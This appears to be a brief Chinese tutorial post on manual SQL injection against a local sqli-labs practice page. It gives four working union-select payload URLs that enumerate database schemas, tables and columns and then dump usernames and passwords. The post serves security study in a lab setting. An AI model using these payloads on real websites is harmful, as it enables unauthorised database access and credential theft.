SQL注入-手工注入方法
2021-04-18 本文已影响0人
bjhu电net
库名
http://192.168.0.108/Less-1/?id=-1' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+
image.png
表名
http://192.168.0.108/Less-1/?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 --+
不使用双引号也可直接使用十六进制(0x****)
image.png
列名
http://192.168.0.108/Less-1/?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3 --+
image.png
数据
http://192.168.0.108/Less-1/?id=-1' union select 1,(select group_concat(username,'~',password) from security.users),3 --+
image.png
核心语法
image.png
